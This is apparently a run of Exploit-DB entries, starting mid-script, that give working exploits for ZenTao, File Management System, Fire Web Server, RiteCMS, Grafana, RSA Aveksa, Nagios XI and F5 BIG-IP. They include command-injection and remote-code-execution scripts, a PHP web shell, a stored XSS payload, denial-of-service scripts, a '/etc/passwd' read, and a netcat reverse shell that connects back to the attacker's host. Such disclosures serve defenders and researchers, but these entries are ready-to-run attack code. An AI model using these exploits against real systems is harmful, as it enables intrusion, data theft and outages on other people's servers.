'windowHeight':'790'} path = url + '/zentao/repo-create.html' parameters = 'SCM=Git&name=' + name + '&path=' + git_path + '&encoding=utf-8&client=' + command x.post(path, data=parameters, headers=headers, cookies=cookies, verify=False) print('[*] Creating the repo') def get_shell(url, name, command): headers = {'Accept':'application/json, text/javascript, */*; q=0.01', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With': 'XMLHttpRequest', 'Origin':'http://192.168.223.132', 'Referer':'http://192.168.223.132/pro/repo-create.html', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0', 'Accept-Language':'en-US,en;q=0.5'} cookies = {'ajax_lastNext':'on', 'windowWidth':'1846', 'windowHeight':'790'} path = url + '/zentao/repo-create.html' parameters = 'SCM=Git&name=' + name + '&path=' + git_path + '&encoding=utf-8&client=' + command2 x.post(path, data=parameters, headers=headers, cookies=cookies, verify=False) print('[*] Check your netcat listener!') def main(): switch = True if switch: sign_in(host, username, password) if switch: go_to_repo(host) if switch: create_repo(host, name, command) if switch: get_shell(host, name, command2) switch = False if __name__ == "__main__": main()

# Exploit Title: File Management System 1.1 - Persistent Cross-Site Scripting # Date: 2020-06-30 # Exploit Author: KeopssGroup0day,Inc # Vendor Homepage: https://www.sourcecodester.com/download-code?nid=13333&title=File+Management+System+Very+Complete+Using+PHP%2FMySQLi+version+1.1 # Software Link: https://www.sourcecodester.com/download-code?nid=13333&title=File+Management+System+Very+Complete+Using+PHP%2FMySQLi+version+1.1 # Version: 0.1.0 # Tested on: Kali Linux Source code(view_admin.php.php): <?php require_once("include/connection.php"); $query="SELECT * FROM admin_login"; $result=mysqli_query($conn,$query); while($rs=mysqli_fetch_array($result)){ $id = $rs['id']; $fname=$rs['name']; $admin=$rs['admin_user']; $pass=$rs['admin_password']; $status=$rs['admin_status']; ?> <tr> <td width='10%'><?php echo $fname; ?></td> <td align='center'><?php echo $admin; ?></td> <td align='center' width="20%"><?php echo $pass; ?></td> <td align='center'><?php echo $status; ?></td> <td align='center'><a href="#modalRegisterFormsss?id=<?php echo $id;?>"> <i class="fas fa-user-edit" data-toggle="modal" data-target="#modalRegisterFormsss"></i> </a> | <a href="delete_admin.php?id=<?php echo htmlentities($rs['id']); ?>"><i class='far fa-trash-alt'></i></a></td> </tr> <?php } ?> POC: 1. http://192.168.1.58/Private_Dashboard/view_admin.php 2. Add admin click button 3. We write payload in the name section (<script>alert(1);</script>) 4. And view admin click button 5. And our bad payload will be displayed

# Exploit Title: Fire Web Server 0.1 - Remote Denial of Service (PoC) # Date: 2020-06-26 # Exploit Author: Saeed reza Zamanian # Vendor Homepage: https://sourceforge.net/projects/firewebserver/ # Software Link: https://sourceforge.net/projects/firewebserver/files/ # Version: Pre-Alpha # Tested on: Windows 7 , Windows Vista #!/usr/bin/python import socket,os,sys if len(sys.argv) < 3: print "Usage: python fwspa_dos.py targetIP targetPort" else: print "[*] Sending evil http request to target" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect((sys.argv[1], int(sys.argv[2]))) expl.send("A"*1015) expl.close()

# Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution # Date: 2020-07-03 # Exploit Author: Enes Özeser # Vendor Homepage: http://ritecms.com/ # Version: 2.2.1 # Tested on: Linux # CVE: CVE-2020-23934 1- Go to following url. >> http://(HOST)/cms/ 2- Default username and password is admin:admin. We must know login credentials. 3- Go to "Filemanager" and press "Upload file" button. 4- Choose your php web shell script and upload it. PHP Web Shell Code == <?php system($_GET['cmd']); ?> 5- You can find uploaded file there. >> http://(HOST)/media/(FILE-NAME).php 6- We can execute a command now. >> http://(HOST)/media/(FILE-NAME).php?cmd=id (( REQUEST )) GET /media/(FILE-NAME).php?cmd=id HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://(HOST)/cms/index.php?mode=filemanager&directory=media Connection: close Cookie: icms[device_type]=desktop; icms[guest_date_log]=1593777486; PHPSESSID=mhuunvasd12cveo52fll3u Upgrade-Insecure-Requests: 1 (( RESPONSE )) HTTP/1.1 200 OK Date: Fri, 06 Jul 2020 20:02:13 GMT Server: Apache/2.4.43 (Debian) Content-Length: 14 Connection: close Content-Type: text/html; charset=UTF-8 uid=33(www-data) gid=33(www-data) groups=33(www-data)

# Exploit Title: Grafana 7.0.1 - Denial of Service (PoC) # Date: 2020-05-23 # Exploit Author: mostwanted002 # Vendor Homepage: https://grafana.com/ # Software Link: https://grafana.com/grafana/download # Version: 3.0.1 - 7.0.1 # Tested on: Linux # CVE : CVE-2020-13379 #!/bin/bash if [[ $1 != "" ]]; then curl -I "${1}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D" else echo "Usage: grafana-dos.sh <TARGET>. Example: grafana-dos.sh http://localhost:3000" fi

# Exploit Title: RSA IG&L Aveksa 7.1.1 - Remote Code Execution # Date: 2019-04-16 # Exploit Author: Jakub Palaczynski, Lukasz Plonka # Vendor Homepage: https://www.rsa.com/ # Version: 7.1.1, prior to P02 # CVE : CVE-2019-3759 # (all vulnerable versions can be found at https://www.dell.com/support/security/pl-pl/details/DOC-106943/DSA-2019-134-RSA-Identity-Governance-and-Lifecycle-Product-Security-Update-for-Multiple-Vulnerabi) Information: Authenticated users can bypass authorization and get full access to Workpoint Architect module. This module gives possibility to run Groovy scripts which results in Code Execution. 1. First user needs to learn username and password for Architect (different from Aveksa login). Sample request: https://AVEKSA_HOST/aveksa/main?Oid=193783&ReqType=GetPartial&PageID=ChangeRequestJobPageData&WFObjectID=1%3AWPDS&crID=193783&isAjax=false search for "<IFRAME" in source of HTML and note username and password 2. Log into Architect. Sample request: POST /aveksaWFArchitect/auth/login/ HTTP/1.1 Host: AVEKSA_HOST User-Agent: python wp-product-name: wp-architect Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 146 Cookie: JSESSIONID=session Connection: close {"user":"USERNAME","password":"PASSWORD","dsn":"WPDS","product":{"name":"wp-architect","version":"4.40.16"}} 3. Creating new script that bypasses Java Security Policy and runs "id" system command. * "statementText" - contains base64-encoded Groovy code * "name" (at the end) - script name that must be unique * Save "scriptId" from the response as it is necessary for next request. POST /aveksaWFArchitect/scripts/?refresh=true&replace=false&checkSyntax=false&saveWithRollbackVersion=false HTTP/1.1 Host: AVEKSA_HOST User-Agent: python wp-product-name: wp-architect Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 733 Cookie: JSESSIONID=session Connection: close {"statements":[{"scriptLineId":"-26:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"sequence":1,"scriptClassId":17,"sourceName":"LOCAL","scriptId":"","name":"","validationStatus":0,"validationStatusMsg":"","statement":{"statementText":"U3lzdGVtLnNldFNlY3VyaXR5TWFuYWdlcihudWxsKTsKJ2lkJy5leGVjdXRlKCkudGV4dA==","statementJava":{"javaClass":"","ejb":false,"ejbVersion":"","jndiName":"","method":"","methodIsStatic":false,"returns":{"location":"system","name":""},"useInstance":false,"useInstanceObjectName":"","action":"insert"}}}],"scriptId":"-27:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"name":"SCRIPTNAME","scriptTypeId":3,"validationStatus":0,"falseMsg":"","description":"","emitEvents":false,"errorText":"","saveMethod":"Architect"} 4. Running created script: * In the response you have result of your command PUT /aveksaWFArchitect/scripts/execute/ HTTP/1.1 Host: AVEKSA_HOST User-Agent: python wp-product-name: wp-architect Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 58 Cookie: JSESSIONID=session Connection: close {"id":"SCRIPTID_OF_CREATED_SCRIPT","newTransaction":false,"symbolTable":{}}

# Exploit Title: Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution # Date: 2020-04-11 # Exploit Author: Basim Alabdullah # Vendor homepage: https://www.nagios.com # Version: 5.6.12 # Software link: https://www.nagios.com/downloads/nagios-xi/ # Tested on: CentOS REDHAT 7.7.1908 (core) # # Authenticated Remote Code Execution # import requests import sys import re uname=sys.argv[2] upass=sys.argv[3] ipvictim=sys.argv[1] with requests.session() as s: urlz=ipvictim+"/login.php" headers = { 'Accept-Encoding': 'gzip, deflate, sdch', 'Accept-Language': 'en-US,en;q=0.8', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Referer': ipvictim+'/index.php', 'Connection': 'keep-alive' } response = s.get(urlz, headers=headers) txt=response.text x=re.findall('var nsp_str = "(.*?)"', txt) for xx in x: login = { 'username':uname, 'password':upass, 'nsp':xx, 'page':'auth', 'debug':'', 'pageopt':'login', 'redirect':ipvictim+'/index.php', 'loginButton':'' } rev=s.post(ipvictim+"/login.php",data=login , headers=headers) cmd=s.get(ipvictim+"/includes/components/ccm/?cmd=modify&type=host&id=1&page=1",allow_redirects=True) txt1=cmd.text xp=re.findall('var nsp_str = "(.*?)"', txt1) for xxp in xp: payload = "a|{cat,/etc/passwd};#" exploit=s.get(ipvictim+"/includes/components/xicore/export-rrd.php?host=localhost&service=Root%20Partition&start=011&end=012&step="+payload+"&type=a&nsp="+xxp) print(exploit.text)

#!/bin/bash # # EDB Note Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48642.zip # # Exploit Title: F5 BIG-IP Remote Code Execution # Date: 2020-07-06 # Exploit Authors: Charles Dardaman of Critical Start, TeamARES # Rich Mirch of Critical Start, TeamARES # CVE: CVE-2020-5902 # # Requirements: # Java JDK # hsqldb.jar 1.8 # ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar # if [[ $# -ne 3 ]] then echo echo "Usage: $(basename $0) <server> <localip> <localport>" echo exit 1 fi server=${1?hostname argument required} localip=${2?Locaip argument required} port=${3?Port argument required} if [[ ! -f $server.der ]] then echo "$server.der does not exist - extracting cert" openssl s_client \ -showcerts \ -servername $server \ -connect $server:443 </dev/null 2>/dev/null | openssl x509 -outform DER >$server.der keytool -import \ -alias $server \ -keystore keystore \ -storepass changeit \ -noprompt \ -file $PWD/$server.der else echo "$server.der already exists. skipping extraction step" fi java -jar ysoserial-master-SNAPSHOT.jar \ CommonsCollections6 \ "/bin/nc -e /bin/bash $localip $port" > nc.class xxd -p nc.class | xargs | sed -e 's/ //g' | dd conv=ucase 2>/dev/null > payload.hex if [[ ! -f f5RCE.class ]] then echo "Building exploit" javac -cp hsqldb.jar f5RCE.java fi java -cp hsqldb.jar:. \ -Djavax.net.ssl.trustStore=keystore \ -Djavax.net.ssl.trustStorePassword=changeit \ f5RCE $server payload.hex